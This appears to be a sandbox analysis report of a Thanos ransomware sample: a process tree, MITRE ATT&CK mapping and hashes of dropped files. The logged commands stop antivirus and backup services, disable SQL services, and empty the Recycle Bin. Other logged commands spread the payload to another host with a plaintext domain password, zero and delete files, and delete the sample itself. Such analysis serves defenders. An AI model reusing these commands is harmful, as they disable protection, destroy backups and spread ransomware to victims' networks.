    PID:5660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2136
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5452
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3124
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3408
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5692
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5520
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2944
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5684
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4668
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5652
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4876
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5668
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1548
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5844
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:3456
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5984
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2996
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5904
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:796
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5812
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:556
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5676
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5976
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4264
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5820
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop YooIT /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4596
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5876
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:676
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5952
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:2468
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5916
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2464
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:5968
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:5860
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:340
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:5852
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1188
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6076
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:872
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5960
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2632
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:5928
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:5300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1268
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5936
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3628
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6000
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:6048
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:768
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:4960
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3496
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:5944
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3764
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:5828
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6060
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6116
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:6032
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:6124
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:3156
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:6324
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:1564
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:1272
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:5088
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2972
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  PID:3548
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4272
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  PID:4560
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4964
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE8DF.bat
  2⤵
  PID:5316
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.127.0.14 /USER:EDENFIELD\efadmin P455w0rd
  2⤵
  PID:6556
- C:\Users\Admin\AppData\Local\Temp\4ka40qt3.exe
  "C:\Users\Admin\AppData\Local\Temp\4ka40qt3.exe" \10.127.0.14 -u EDENFIELD\efadmin -p P455w0rd -d -f -h -s -n 2 -c C:\Users\Admin\Downloads\Ransomware.Thanos\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  2⤵
  PID:5244
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  - Network Service Discovery
  PID:6096
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2012
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5500
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\Ransomware.Thanos\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  2⤵
  PID:6204
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fe68444a298dfe7ce3afb15e1e04dc2d

SHA1
ce8500b8bc9f8033bf5f6b28174d04852e996cde

SHA256
4fa17fcbb66e9306869abf881cf02c7b890bd34c34852c8a8f0e276bab375ba0

SHA512
ed3aec46de266977a45e00363f3e258e53e9763fd5304861d2a7582344f6364f9dba20d5a13e6c2eee42e6bb875eec2f3e900f45cc64bf911e7055008c2374c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
648295913e8e74a91d84a0bd6dfa0efe

SHA1
e42c17ec7e237fa16204bd204ba0d47c2e7aa057

SHA256
3f46ccf49be312c1e7b3cd94ff1d27970975d6a80e052769daf31c772adb260c

SHA512
6e3f03fade65388ad14c2443300f79d028986a7863d32ad731a3b1aef4bc4937e7cb150c814947befdf4d2a8510f70368ad35621ae854b9037e46488df7423e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
21KB

MD5
1401e9fee77d1f2ac68382f3e92290d0

SHA1
3016320f4984fc3bea3b64f56900478a7eaecc53

SHA256
1681cf800cad8c704acc3eba63766b2bc724de769092153121f73a34c61f6564

SHA512
a4138eb2b7c6f777dc6b65294a1087501ea4f7ddc082c5455f5998fbee4bc16e28e4d11d0663011cb5889077b2557810a421d6569ab1b796fc94e0e2cd4193d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
22KB

MD5
cc09b2f59a4470793a3f6698cbca5e63

SHA1
f39ce1b732a760a95946a83a0dd8280da4bf47d6

SHA256
213b48665f34b6d14647b6c61a1b59e0a4f10db9e819f9021f3f13f062b03af4

SHA512
94251d4ff7db9ffc769588de1e877993eb4a1c3f4a6a0c3cfd4097a6c2e48560fe8f2c035b04e6c40e83241ee1c561fa3731e2310f67ed1f8afc3852785eec9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
09d8c364f2b6182225b83b0fa543b308

SHA1
cabc8e53e2b9a2893106e04c93b64fdce0795bb8

SHA256
783fa11b15682f77f2873d823123613cf1c2067914383172cf876d437faddeb3

SHA512
5c33163e56c686913f1fea164c670fa87647c4253c4d731dded65a74d3fcd59c015b1e2158fe29061f3ab1a003cf0bbaf9073218df97c8d61385e9d07c64a9e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
0a8a7c3dafeb4ad3d8cb846fc95b8f1c

SHA1
69e2b994e6882e1e783410dae53181984050fa13

SHA256
a88495f2c1c26c6c1d5690a29289467c8bb8a94bf6f4801d2c14da1456773f90

SHA512
2e59b4cd4cf6f86537aae4ae88e56e21abcff5070c5c1d1d2105a8e863523c80740438cc36b2b57672bc7bb7fb9387896135afcce534edfd4697fecf61031a5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
acce71671c1d3a971928dc70fed64236

SHA1
51dfec0743ba17dde27293cd36f9d3ccf65dfacc

SHA256
7748eae619601aa3c10c92337bb073661f6b8826faad851f4457ad8dc03ef113

SHA512
84a1f29b446e02c6a670d43d4194b6a89189459db76d2589611952f23fbe983cd05184c9c7245217b5862e6fb78d15fae8e24b4d8636736cc22813c112879cc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4a1345f3da63a15040152c398019274a

SHA1
efb51e5893aa412cbc586bb8fd248ea661dd8fde

SHA256
fe6501b263ee72afa8f1ae2eea0349f5b6b811963501393746afd06031bdb2b2

SHA512
a3fa95ab3bb4f9463e9f6e852ac205212acae7f88c4b4f3d046f9088ce092142bd3b090d994b4ff333f16dda1bb767a083ade3a7b692ad487be22cff6935bcd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d29fff63e9078b8a51997d31d38d02ee

SHA1
573ab028108f445224eb26e6079a869db938db27

SHA256
96c50481f18fbb9c47937cb210a2a38caf4550e53db2baddcce4439930bb00ba

SHA512
047966632edab6e595879245d47227ded8cc68b27d431a82057754dc7c25e50e39860c5c64e38f6bb46a0199660599dd774238e4c338c746826db054a892616e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
99ccb8bb117a66fe2d62f532a24f2228

SHA1
afee7d1a44ecc48db78a0ba66de70fcc2901834c

SHA256
033bbae1c1481fd182d022cc43fd8896c8c4ec481287607543f6ce638516bd91

SHA512
312923d53c301617edb8a8847ebe5c511a6d41673a751099922c4cebbe62404c4777318c0b452e564782474e475bb1c98df1e944be07af3c04abf9ea713f7baa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
3342f9d4896aeab43bce07300d8bbb73

SHA1
bd95aaa10afec01d7a1bf30e1899d63ea2c59cf4

SHA256
bf8147e09936e0eb2575fd5530756b9bfb0dac8fd8a4ec13c5260176d0ce6124

SHA512
e4a4792f798a361ebcf0f8ffcd8074b5f866216ccd384a14f415c1605ec9ff63bddb95065b850186b88b91deff6deba36cba5662dafefbde4967040d2915a59e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e296766a31cf49f56af99ec56a0d2f21

SHA1
ee8b78728d9977a8da34f38bf70283b8a87bcc09

SHA256
d9ef27b47bf37bcf1d816af0a64e7858996291803cba179ee92c9b73193251da

SHA512
3ee60fadcf812c6166d72b294e25db860953923bf54e3e8191b1313858a407cfbedaaa2fce8c0f9372ea38c00862f56bd0f9894742f2fad9f5cd44b0a3eb71e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8e748c47f621f413884f42cfff9c9b7f

SHA1
e515271aa97dfb5941475effa21ea4577eb0963e

SHA256
57719c3d5d079e3252ff3450d662b264010eea502ad7a7e7b988802eb882eb62

SHA512
87f9cd772becaa058b9e13acee6373a00a20238be6c4fca9c98c8d21c324d46f6154177031ef080a83704611bb3e6202c3f7196d7cbbbda3556ef2812907538e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57cd04.TMP

Filesize
1KB

MD5
40652a0374742fa95b87bfeb968f2113

SHA1
1bb717c93387b340baab8ee8550f6bfd1da79d27

SHA256
d9d33cc1263af6a20533df4a5c42d3f94c8416571abed3ab3d4ac0eed0b31755

SHA512
16e7e4d4a1a33a03e575cfbd4ff1353272d8373fad5415cb5f126a653f0904bc3e46eb6b551348f36a131807ea89ca915bf509ce5063d1c1aa1b9431c8ddc2b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8bf00ce2f7dc927329d5ba5e10e34303

SHA1
5fb8a3b420ea04ef6136b20391a597e75deeca5f

SHA256
46bbd3214ffa5c833dd6588d5e5721fdd0ac9bde67b78c7493ffd386eb377059

SHA512
1dc460befa659f47082f371cd7e2a56c970dc55e370a60bcbf8c41a35749a8026824524039e0c73ec6a1c802aa8c2c2c5701ef057693f119dc013614809d0a5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
51ca1803d2466f629583fadd2d6006bc

SHA1
d8ac665c26927da670360d00441e140d4e3abc2c

SHA256
e6c60bf2c6cfe14838a287632d92831506234dc4dbcec76f9a48ab643b3f7972

SHA512
d642f413b076899746d363be0d57278907dfeecb1b7d7df41f9dda94d2d620c25aa07e96b311c2a8456b9d789acc217e1d1a71a59f8cc8e782df495f53c52897

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4814aef68a26496bcba69f26a1f78176

SHA1
24333ab81e8c47899d6e5880303e2df4f00b8b94

SHA256
ac9ab0cea91b6f9ed4dea6b2c21afda9d4dc835dac22fdb8bd06f9316c12ff2f

SHA512
ffc9b2129932164504d5f944d23764681b8d13ece7e999666cf67273c0a8560356c5bea9ca18ba1cd0245933ecb4363e8f3215ce2af9bc9671d5b50b247735d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
2709d23fc4a4e4706bd8f67db1e72b06

SHA1
ba8e1c4e800ef7b145b584c7b91f29f38b4575de

SHA256
42baada4223de6b96ee55c1568a63255801f085e207896b31cfe5b12ab9433d2

SHA512
d90e68b8f739c4545f9e33ca81d6bbb16e34ba045c79474951d98eb78604a58755c0ff3c2b4e815c0f2605ff3b8e2459ab951fc1abe717ec69f90b5fbc2517b1

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
25KB

MD5
54f7bd3307ac42493f8fd91f44f7c2d8

SHA1
00a701198d75eb7d7460d3f59b2842071d9b6129

SHA256
9b908c6196f1a4f19df70528b0c51699a6662c898b497218c4af5fa1e383fba1

SHA512
f3da806157d9b7bb59b6ded3d1f68fe3ec53818db5e8fa6e13e6bc01a4c2e78a5e4476cf48beb7a1e3655114152cdf9b68df9b2d2c447d5dc5e12075bb7d360b

Download Submit
C:\Users\Admin\AppData\Local\Temp\4ka40qt3.exe

Filesize
232KB

MD5
75a586728aa168951b1c48f28f34c553

SHA1
4e150e7cbffa43fb120876221343af15b3332049

SHA256
9c2a20b67ede0cc57eb3e3708ead52d98ad6065d5a539319d771846acfac6a75

SHA512
586aff19e18c0b30c9e3aa859c3dc028c2472625e98ef7c46e023118ce518cea149f4a8fe45dc3d43aba2e2e8a9faeb9ef34c25fa5b745e5fa294bbcdde04851

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwy2vylq.43e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
180KB

MD5
b06d9dd17c69ed2ae75d9e40b2631b42

SHA1
b606aaa402bfe4a15ef80165e964d384f25564e4

SHA256
bc98c8b22461a2c2631b2feec399208fdc4ecd1cd2229066c2f385caa958daa3

SHA512
8e54aca4feb51611142c1f2bf303200113604013c2603eea22d72d00297cb1cb40a2ef11f5129989cd14f90e495db79bffd15bd6282ff564c4af7975b1610c1c

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Filesize
1KB

MD5
29367e4e8c5d980ffe2b73f2f31d4daf

SHA1
20c8d0c2ddc440ccf6bc412224a47706d38ad14e

SHA256
ae93b6fdc3f473b50a395f3c88e4ef22c4e2d709dc5b989551006710b5f787e9

SHA512
59a58c051142a9696f2869902900a3c2c00c87833a73de2bc98dfb219060262472d0c2fd0f33bfb77ffd5db0c851ecd87e1796c1d6529264c82932ea14427191

Download Submit
C:\Users\Admin\Downloads\Ransomware.Locky.zip

Filesize
125KB

MD5
b265305541dce2a140da7802442fbac4

SHA1
63d0b780954a2bc96b3a77d9a2b3369d865bf1fd

SHA256
0537fa38b88755f39df1cd774b907ec759dacab2388dc0109f4db9f0e9d191a0

SHA512
af65384f814633fe1cde8bf4a3a1a8f083c7f5f0b7f105d47f3324cd2a8c9184ccf13cb3e43b47473d52f39f4151e7a9da1e9a16868da50abb74fcbc47724282

Download Submit
C:\Users\Admin\Downloads\Ransomware.Thanos.zip

Filesize
145KB

MD5
00184463f3b071369d60353c692be6f0

SHA1
d3c1e90f39da2997ef4888b54d706b1a1fde642a

SHA256
cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

SHA512
baa931a23ecbcb15dda6a1dc46d65fd74b46ccea8891c48f0822a8a10092b7d4f7ea1dc971946a161ac861f0aa8b99362d5bea960b47b10f8c91e33d1b018006

Download Submit
C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
memory/2832-582-0x0000000000BB0000-0x0000000000BCC000-memory.dmp

Filesize
112KB

Download
memory/2832-586-0x0000000006EF0000-0x0000000006F56000-memory.dmp

Filesize
408KB

Download
memory/4576-573-0x0000000000400000-0x00000000007D1000-memory.dmp

Filesize
3.8MB

Download
memory/4576-581-0x0000000000400000-0x00000000007D1000-memory.dmp

Filesize
3.8MB

Download
memory/4972-643-0x0000000007410000-0x0000000007A8A000-memory.dmp

Filesize
6.5MB

Download
memory/4972-601-0x0000000005670000-0x00000000059C7000-memory.dmp

Filesize
3.3MB

Download
memory/4972-589-0x0000000000E00000-0x0000000000E36000-memory.dmp

Filesize
216KB

Download
memory/4972-602-0x0000000005A70000-0x0000000005A8E000-memory.dmp

Filesize
120KB

Download
memory/4972-605-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

Filesize
304KB

Download
memory/4972-624-0x000000006F600000-0x000000006F64C000-memory.dmp

Filesize
304KB

Download
memory/4972-633-0x0000000006090000-0x00000000060AE000-memory.dmp

Filesize
120KB

Download
memory/4972-623-0x0000000006C50000-0x0000000006C84000-memory.dmp

Filesize
208KB

Download
memory/4972-591-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

Filesize
136KB

Download
memory/4972-637-0x0000000006C90000-0x0000000006D34000-memory.dmp

Filesize
656KB

Download
memory/4972-652-0x0000000007060000-0x00000000070F6000-memory.dmp

Filesize
600KB

Download
memory/4972-648-0x0000000006E50000-0x0000000006E5A000-memory.dmp

Filesize
40KB

Download
memory/4972-645-0x0000000006DD0000-0x0000000006DEA000-memory.dmp

Filesize
104KB

Download
memory/4972-654-0x0000000006FE0000-0x0000000006FF1000-memory.dmp

Filesize
68KB

Download
memory/4972-662-0x0000000007010000-0x000000000701E000-memory.dmp

Filesize
56KB

Download
memory/4972-665-0x0000000007020000-0x0000000007035000-memory.dmp

Filesize
84KB

Download
memory/4972-667-0x0000000007120000-0x000000000713A000-memory.dmp

Filesize
104KB

Download
memory/4972-676-0x0000000007110000-0x0000000007118000-memory.dmp

Filesize
32KB

Download
memory/4972-590-0x0000000005040000-0x000000000566A000-memory.dmp

Filesize
6.2MB

Download
memory/4972-592-0x0000000004D70000-0x0000000004DD6000-memory.dmp

Filesize
408KB

Download